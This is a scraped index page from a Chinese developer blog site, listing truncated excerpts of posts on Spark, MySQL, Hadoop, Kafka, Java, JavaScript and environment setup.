    Task not serializable是Spark开发过程最令人头疼的问题之一,这里记录下出现这个问题的两个实例,一个是自己遇到的,另一个是stackoverflow上看到。等有时间了再仔细探究出现Task not serialiazable的各种原因以及出现问题后如何快速定位问题的所在,至少目前阶段碰到此类问题,没有什么章法 1.   package spark.exampl
  • 你所熟知的 LRU(最近最少使用) dalan_123 java
    关于LRU这个名词在很多地方或听说,或使用,接下来看下lru缓存回收的实现 1、大体的想法     a、查询出最近最晚使用的项     b、给最近的使用的项做标记 通过使用链表就可以完成这两个操作,关于最近最少使用的项只需要返回链表的尾部;标记最近使用的项,只需要将该项移除并放置到头部,那么难点就出现 你如何能够快速在链表定位对应的该项? 这时候多
  • Javascript 跨域 周凡杨 JavaScriptjsonp跨域cross-domain
                                       
  • linux下安装apache服务器 g21121 apache
    安装apache 下载windows版本apache,下载地址:http://httpd.apache.org/download.cgi   1.windows下安装apache Windows下安装apache比较简单,注意选择路径和端口即可,这里就不再赘述了。 2.linux下安装apache: 下载之后上传到linux的相关目录,这里指定为/home/apach
  • FineReport的JS编辑框和URL地址栏语法简介 老A不折腾 finereportweb报表报表软件语法总结
      JS编辑框: 1.FineReport的js。 作为一款BS产品,browser端的JavaScript是必不可少的。 FineReport中的js是已经调用了finereport.js的。 大家知道,预览报表时,报表servlet会将cpt模板转为html,在这个html的head头部中会引入FineReport的js,这个finereport.js中包含了许多内置的fun
  • 根据STATUS信息对MySQL进行优化 墙头上一根草 status
    mysql  查看当前正在执行的操作,即正在执行的sql语句的方法为:      show processlist 命令   mysql> show global status;可以列出MySQL服务器运行各种状态值,我个人较喜欢的用法是show status like '查询值%';一、慢查询mysql> show variab
  • 我的spring学习笔记7-Spring的Bean配置文件给Bean定义别名 aijuans Spring 3
    本文介绍如何给Spring的Bean配置文件的Bean定义别名? 原始的 <bean id="business" class="onlyfun.caterpillar.device.Business"> <property name="writer"> <ref b
  • 高性能mysql 之 性能剖析 annan211 性能mysqlmysql 性能剖析剖析
    1 定义性能优化 mysql服务器性能,此处定义为 响应时间。 在解释性能优化之前,先来消除一个误解,很多人认为,性能优化就是降低cpu的利用率或者减少对资源的使用。 这是一个陷阱。 资源时用来消耗并用来工作的,所以有时候消耗更多的资源能够加快查询速度,保持cpu忙绿,这是必要的。很多时候发现 编译进了新版本的InnoDB之后,cpu利用率上升的很厉害,这并不
  • 主外键和索引唯一性约束 百合不是茶 索引唯一性约束主外键约束联机删除
    目标;第一步;创建两张表 用户表和文章表         第二步;发表文章       1,建表; ---用户表 BlogUsers --userID唯一的 --userName --pwd --sex create
  • 线程的调度 bijian1013 java多线程thread线程的调度java多线程
    1.       Java提供一个线程调度程序来监控程序中启动后进入可运行状态的所有线程。线程调度程序按照线程的优先级决定应调度哪些线程来执行。   2.       多数线程的调度是抢占式的(即我想中断程序运行就中断,不需要和将被中断的程序协商) a) 
  • 查看日志常用命令 bijian1013 linux命令unix
    一.日志查找方法,可以用通配符查某台主机上的所有服务器grep "关键字" /wls/applogs/custom-*/error.log   二.查看日志常用命令1.grep '关键字' error.log:在error.log中搜索'关键字'2.grep -C10 '关键字' error.log:显示关键字前后10行记录3.grep '关键字' error.l
  • 【持久化框架MyBatis3一】MyBatis版HelloWorld bit1129 helloworld
    MyBatis这个系列的文章,主要参考《Java Persistence with MyBatis 3》。   样例数据 本文以MySQL数据库为例,建立一个STUDENTS表,插入两条数据,然后进行单表的增删改查     CREATE TABLE STUDENTS ( stud_id int(11) NOT NULL AUTO_INCREMENT,
  • 【Hadoop十五】Hadoop Counter bit1129 hadoop
       1. 只有Map任务的Map Reduce Job File System Counters FILE: Number of bytes read=3629530 FILE: Number of bytes written=98312 FILE: Number of read operations=0 FILE: Number of lar
  • 解决Tomcat数据连接池无法释放 ronin47 tomcat 连接池 优化
    近段时间,公司的检测中心报表系统(SMC)的开发人员时不时找到我,说用户老是出现无法登录的情况。前些日子因为手头上 有Jboss集群的测试工作,发现用户不能登录时,都是在Tomcat中将这个项目Reload一下就好了,不过只是治标而已,因为大概几个小时之后又会 再次出现无法登录的情况。 今天上午,开发人员小毛又找到我,要我协助将这个问题根治一下,拖太久用户难保不投诉。 简单分析了一
  • java-75-二叉树两结点的最低共同父结点 bylijinnan java
    import java.util.LinkedList; import java.util.List; import ljn.help.*; public class BTreeLowestParentOfTwoNodes { public static void main(String[] args) { /* * node data is stored in
  • 行业垂直搜索引擎网页抓取项目 carlwu LuceneNutchHeritrixSolr
    公司有一个搜索引擎项目,希望各路高人有空来帮忙指导,谢谢! 这是详细需求: (1) 通过提供的网站地址(大概100-200个网站),网页抓取程序能不断抓取网页和其它类型的文件(如Excel、PDF、Word、ppt及zip类型),并且程序能够根据事先提供的规则,过滤掉不相干的下载内容。 (2) 程序能够搜索这些抓取的内容,并能对这些抓取文件按照油田名进行分类,然后放到服务器不同的目录中。
  • [通讯与服务]在总带宽资源没有大幅增加之前,不适宜大幅度降低资费 comsci 资源
          降低通讯服务资费,就意味着有更多的用户进入,就意味着通讯服务提供商要接待和服务更多的用户,在总体运维成本没有由于技术升级而大幅下降的情况下,这种降低资费的行为将导致每个用户的平均带宽不断下降,而享受到的服务质量也在下降,这对用户和服务商都是不利的。。。。。。。。     &nbs
  • Java时区转换及时间格式 Cwind java
    本文介绍Java API 中 Date, Calendar, TimeZone和DateFormat的使用,以及不同时区时间相互转化的方法和原理。   问题描述: 向处于不同时区的服务器发请求时需要考虑时区转换的问题。譬如,服务器位于东八区(北京时间,GMT+8:00),而身处东四区的用户想要查询当天的销售记录。则需把东四区的“今天”这个时间范围转换为服务器所在时区的时间范围。
  • readonly,只读,不可用 dashuaifu jsjspdisablereadOnlyreadOnly
    readOnly 和 readonly 不同,在做js开发时一定要注意函数大小写和jsp黄线的警告!!!我就经历过这么一件事: 使用readOnly在某些浏览器或同一浏览器不同版本有的可以实现“只读”功能,有的就不行,而且函数readOnly有黄线警告!!!就这样被折磨了不短时间!!!(期间使用过disable函数,但是发现disable函数之后后台接收不到前台的的数据!!!)  
  • LABjs、RequireJS、SeaJS 介绍 dcj3sjt126com jsWeb
    LABjs 的核心是 LAB(Loading and Blocking):Loading 指异步并行加载,Blocking 是指同步等待执行。LABjs 通过优雅的语法(script 和 wait)实现了这两大特性,核心价值是性能优化。LABjs 是一个文件加载器。RequireJS 和 SeaJS 则是模块加载器,倡导的是一种模块化开发理念,核心价值是让 JavaScript 的模块化开发变得更
  • [应用结构]入口脚本 dcj3sjt126com PHPyii2
    入口脚本 入口脚本是应用启动流程中的第一环,一个应用(不管是网页应用还是控制台应用)只有一个入口脚本。终端用户的请求通过入口脚本实例化应用并将将请求转发到应用。 Web 应用的入口脚本必须放在终端用户能够访问的目录下,通常命名为 index.php,也可以使用 Web 服务器能定位到的其他名称。 控制台应用的入口脚本一般在应用根目录下命名为 yii(后缀为.php),该文
  • haoop shell命令 eksliang hadoophadoop shell
    cat chgrp chmod chown copyFromLocal copyToLocal cp du dus expunge get getmerge ls lsr mkdir movefromLocal mv put rm rmr setrep stat tail test text
  • MultiStateView不同的状态下显示不同的界面 gundumw100 android
    只要将指定的view放在该控件里面,可以该view在不同的状态下显示不同的界面,这对ListView很有用,比如加载界面,空白界面,错误界面。而且这些见面由你指定布局,非常灵活。 PS:ListView虽然可以设置一个EmptyView,但使用起来不方便,不灵活,有点累赘。 <com.kennyc.view.MultiStateView xmlns:android=&qu
  • jQuery实现页面内锚点平滑跳转 ini JavaScripthtmljqueryhtml5css
    平时我们做导航滚动到内容都是通过锚点来做,刷的一下就直接跳到内容了,没有一丝的滚动效果,而且 url 链接最后会有“小尾巴”,就像#keleyi,今天我就介绍一款 jquery 做的滚动的特效,既可以设置滚动速度,又可以在 url 链接上没有“小尾巴”。   效果体验:http://keleyi.com/keleyi/phtml/jqtexiao/37.htmHTML文件代码: &
  • kafka offset迁移 kane_xie kafka
    在早前的kafka版本中(0.8.0),offset是被存储在zookeeper中的。   到当前版本(0.8.2)为止,kafka同时支持offset存储在zookeeper和offset manager(broker)中。   从官方的说明来看,未来offset的zookeeper存储将会被弃用。因此现有的基于kafka的项目如果今后计划保持更新的话,可以考虑在合适
  • android > 搭建 cordova 环境 mft8899 android
      1 , 安装 node.js        http://nodejs.org      node -v   查看版本   2, 安装 npm   可以先从  https://github.com/isaacs/npm/tags  下载 源码 解压到
  • java封装的比较器,比较是否全相同,获取不同字段名字 qifeifei
     非常实用的java比较器,贴上代码: import java.util.HashSet; import java.util.List; import java.util.Set; import net.sf.json.JSONArray; import net.sf.json.JSONObject; import net.sf.json.JsonConfig; i
  • 记录一些函数用法 .Aky. 位运算PHP数据库函数IP
    高手们照旧忽略。 想弄个全天朝IP段数据库,找了个今天最新更新的国内所有运营商IP段,copy到文件,用文件函数,字符串函数把玩下。分割出startIp和endIp这样格式写入.txt文件,直接用phpmyadmin导入.csv文件的形式导入。(生命在于折腾,也许你们觉得我傻X,直接下载人家弄好的导入不就可以,做自己的菜鸟,让别人去说吧) 当然用到了ip2long()函数把字符串转为整型数
  • sublime text 3 rust wudixiaotie Sublime Text
    1.sublime text 3 => install package => Rust 2.cd ~/.config/sublime-text-3/Packages 3.mkdir rust 4.git clone https://github.com/sp0/rust-style 5.cd rust-style 6.cargo build --release 7.ctrl
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他